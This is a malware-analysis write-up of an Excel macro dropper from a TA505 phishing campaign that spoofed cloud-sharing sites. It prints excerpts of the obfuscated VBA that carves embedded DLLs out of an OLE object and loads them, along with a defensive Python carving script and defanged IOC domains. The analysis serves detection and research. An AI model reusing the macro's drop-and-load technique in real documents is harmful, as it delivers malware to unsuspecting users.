Starting in September we have seen a rise in campaigns from the TA505 threat actor. They send bulk emails spoofing notifications about files hosted on (spoofed) cloud-sharing services. The sites look very similar to the real ones and serve MS Excel files and, in some cases, Word documents, which contain VBA macros that drop and execute malicious DLLs. These campaigns deliver RATs and downloaders. More IOCs are listed at the end of the post, but only one sample is analysed here. After all, we have to do some ‘evil code analysis.’
This particular sample ‘N98300_10.21.19.xls’ (6e31b0051adf99888d50d8679c329ffb9b41991e04d8b639cc01f13e5f46656f) was downloaded from hxxps://dl2.dropbox-er[.]com/?BSoFW, which spoofed a dropbox file download page.
As soon as the file is downloaded and opened, the event handler below should have fired; instead, a compilation error stops it.
Since PtrSafe is used in both the #If and #Else branches, the module fails to compile under VBA 6 or earlier, which does not know the PtrSafe keyword (it was introduced with VBA7 in Office 2010; the supported idiom is to test #If VBA7 and use PtrSafe only in that branch). So this macro is not backward compatible, probably a mistake by the malware author.
If we look at the directives, the only differences between the two branches are the PtrSafe keywords in the Win64 case and the DLL file names, libDxdiag2.dll vs libDxdiag1.dll.
The AppStart function below, in Module1, initializes some variables.
```vba
Public Sub AppStart()
    Dim PointerNull As Object
    Dim SpecialPath As String
    Set PointerNull = CreateObject("WScri" + "pt.Shell")   '<-- WScript.Shell object; the name is split to defeat simple string matching
    UserForm6.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm6.TextBox1.Tag + "%")
    '^ expands to %Temp%
    UserForm6.TextBox2.Tag = PointerNull.SpecialFolders(UserForm6.TextBox2.Tag)
    '^ resolves to the Templates special folder, i.e. %AppData%\Microsoft\Windows\Templates
    ChDir (UserForm6.TextBox1.Tag)
    UserForm1.Show
End Sub
```
The function ReplaceCurrentModule() in Module5 holds most of the meat of this malicious macro.
It concatenates variables and strings to build the file names it will use:
```text
TextBox1Tag  = %Temp%\libProject.xlsx
ZipName      = %Temp%\libProject.xlsx.zip
ZipFolder    = %Temp%
nm           = %AppData%\Microsoft\Windows\Templates\libDxdiag1
CNPK         = 278528
FilePosition = 1
```
The directives below then override some of these values on 64-bit Office:
```vba
#If Win64 Then
    nm = UserForm6.TextBox2.Tag + "\libDxdiag2"
    CNPK = 252928
    FilePosition = 2
#End If
```
After the #End If, ".dll" is appended to nm, giving libDxdiag1.dll (32-bit) or libDxdiag2.dll (64-bit).
The KillArray function in Module6 deletes the files in case they are already present at the locations above.
```vba
' Call site: the wildcard %Temp%\oleObject*.bin, the .zip copy and the DLL path
'KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, nm
Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next        ' swallow "file not found" when nothing is there yet
    For Each Key In PathList
        Kill Key                ' Kill accepts wildcards, so oleObject*.bin removes any stale copies
    Next Key
    On Error GoTo 0
End Sub
```
Then the ReplaceFile function saves this workbook as %Temp%\libProject.xlsx with file format 51 (xlOpenXMLWorkbook), i.e. the zip-based Open XML format. More on the Excel file-format enumeration here.
After that the same file is copied to the same folder with a .zip extension:
```vba
FileCopy TextBox1Tag, ZipName
```
In the next part of this function the embedded OLE object, stored inside the zip at xl\embeddings\oleObject1.bin, is extracted to ZipFolder (%Temp%); this is the stream that carries the DLLs.
Next, the function below from Module1 is called:
```vba
NewValuje ZipFolder + "\oleObject" + "1" + ".b" + "in", nm, CNPK, FilePosition
```
This function copies the embedded DLL bytes out of oleObject1.bin into the DLL file. It does not parse the OLE container at all: it scans for the MZ header bytes 4D 5A 90 and, on the requested occurrence, copies a fixed number of bytes.
The function parameters are:
s = C:\Users\REM\AppData\Local\Temp\oleObject1.bin (source to copy from)
nm = C:\Users\REM\AppData\Roaming\Microsoft\Windows\Templates\libDxdiag1.dll (DLL to write)
fl = 278528 (number of bytes to copy, i.e. the DLL length)
Variable_6 = 1 (or 2: which MZ-header occurrence to start from, since two DLLs are embedded in the XLS)
```vba
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long
    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)        '<-- decimal 77  = 'M'
    Variable_5(2) = CByte(40 + 50)        '<-- decimal 90  = 'Z'
    Variable_5(1 + 2) = CByte(40 + 104)   '<-- decimal 144 = 0x90
    ' so the first 3 bytes of Variable_5 are 4D 5A 90, the start of a DOS stub
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
            Get Variable_1, , Variable_3
            If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                    If cur = Variable_6 Then   ' first occurrence when FilePosition = 1 (32-bit)
                        For k = 4 To fl        ' copy the remaining fl - 3 bytes verbatim
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                        Next k
                        Exit Do
                    Else
                        cur = cur + 1          ' skip ahead to the next occurrence (FilePosition = 2, 64-bit)
                    End If
                End If
            End If
        End If
    Loop
    Close Variable_1
    ' the rest of the routine, which writes Variable_5 out to nm, is not reproduced here
End Sub
```
Then the buffered bytes are written to the path in nm, producing the DLL. Note that the loop matches the raw byte sequence rather than parsing the OLE stream, so the DLL lengths are hard-coded and the 64-bit DLL is simply the second signature hit in the stream.
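To make the extraction chain concrete, here is an added Python example (mine, not code from the macro or from the original post) that scripts the same steps an analyst would run by hand: open the saved .xlsx as a zip, pull xl/embeddings/oleObject1.bin, find the N-th 4D 5A 90 signature and slice out a fixed-length DLL exactly as NewValuje does, and then go one step further than the macro by following e_lfanew to the COFF Machine field so you can tell which carved file is the x86 DLL and which the x64 one. The workbook and the two "DLLs" are constructed stand-ins built inside the script; the real sample's lengths (278528 and 252928) are only mirrored as parameters.

```python
import io
import struct
import zipfile

# The three bytes the macro compares against: 'M', 'Z', 0x90 (start of a typical DOS stub).
MZ_SIG = b"MZ\x90"
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64"}


def extract_ole_object(xlsx_bytes, member="xl/embeddings/oleObject1.bin"):
    """Step 1: an .xlsx is a zip, so the embedded OLE object is just a member file."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return zf.read(member)


def find_mz_offsets(blob):
    """Step 2: every offset where the 4D 5A 90 signature occurs, in order."""
    offsets, start = [], 0
    while True:
        idx = blob.find(MZ_SIG, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + len(MZ_SIG)


def carve_nth_pe(blob, length, position):
    """Step 3: what NewValuje does -- take `length` bytes starting at the
    `position`-th signature hit (1-based). Like the macro, this trusts a
    hard-coded length and never parses the OLE container.
    Returns None if there are fewer hits than `position`."""
    hits = find_mz_offsets(blob)
    if position < 1 or position > len(hits):
        return None
    off = hits[position - 1]
    return blob[off:off + length]


def pe_machine(data):
    """Extra check the macro never does: follow e_lfanew (offset 0x3C) to the
    PE signature and read the COFF Machine field, so an analyst can tell
    which carved DLL is x86 and which is x64. None if it is not a sane PE."""
    if not data or len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return MACHINE_NAMES.get(machine, hex(machine))


def carve_all(xlsx_bytes, plan):
    """Drive the steps for each (name, length, position) entry, mirroring the
    macro's libDxdiag1 / libDxdiag2 parameters. Returns {name: (bytes, machine)}."""
    ole = extract_ole_object(xlsx_bytes)
    result = {}
    for name, length, position in plan:
        dll = carve_nth_pe(ole, length, position)
        result[name] = (dll, pe_machine(dll))
    return result


# --- constructed test data (stand-ins, not the real sample) -----------------------

def fake_pe(machine, size):
    """A minimal stand-in for a DLL: MZ 90 stub, e_lfanew pointing at a PE header at 0x40."""
    hdr = bytearray(b"MZ\x90\x00" + b"\x00" * (0x3C - 4))
    hdr += struct.pack("<I", 0x40)                 # e_lfanew
    hdr += b"PE\x00\x00" + struct.pack("<H", machine)
    return bytes(hdr) + b"\xCC" * (size - len(hdr))


def build_sample_xlsx(dll32, dll64):
    """Zip up a fake workbook whose oleObject1.bin carries two DLLs back to back,
    plus a decoy 'MZ' that is NOT followed by 0x90: the macro's third-byte check
    is what keeps it from tripping on such strings."""
    decoy = b"MZ\x00 not a DOS stub "
    ole = b"\xD0\xCF\x11\xE0" + b"\x00" * 28 + decoy + dll32 + b"\x00" * 16 + dll64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/embeddings/oleObject1.bin", ole)
    return buf.getvalue()


DLL32_LEN, DLL64_LEN = 128, 96   # the real sample used 278528 and 252928
SAMPLE_XLSX = build_sample_xlsx(fake_pe(0x014C, DLL32_LEN), fake_pe(0x8664, DLL64_LEN))
PLAN = [("libDxdiag1.dll", DLL32_LEN, 1), ("libDxdiag2.dll", DLL64_LEN, 2)]

if __name__ == "__main__":
    for name, (dll, machine) in carve_all(SAMPLE_XLSX, PLAN).items():
        print(f"{name}: {len(dll)} bytes, machine={machine}")
```

Against a real sample you would pass the bytes of the saved libProject.xlsx and the CNPK/FilePosition pairs from the macro; the Machine check is the quick confirmation that position 1 really is the 32-bit DLL and position 2 the 64-bit one before you hand them to a debugger.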
At the end ReplaceCurrentModule() loads the DLL using LoadLibraryW, declared earlier under the alias GetName2:
```vba
GetName2 (nm)   'Already imported
```
and then calls the DLL's exported GetName function, which merely runs DLLEntryPoint.
The x64 version appears to be UPX packed.
Beyond that, the macro does nothing out of the ordinary except for the social-engineering part, where it shows a UserForm image resembling an Office component installation that has failed.
Of all the variants of this macro I have seen, the sample above is the only one with the compilation error.
I use urlscan.io to hunt for similar URLs, e.g. the query https://urlscan.io/search/#domain%3A%20googledrive-*. Similar queries can be used to find the other domains. Note that the TA505 domains redirect to apple.com, possibly to evade urlscan.io, but I have found that redirect to be a good indicator that a domain belongs to the same group.
Below are other domains that look like cloud-storage file download pages:
box-cnd[.]com <– using onehub.com
Other lesser-known services such as ownCloud and Sync have also been spoofed.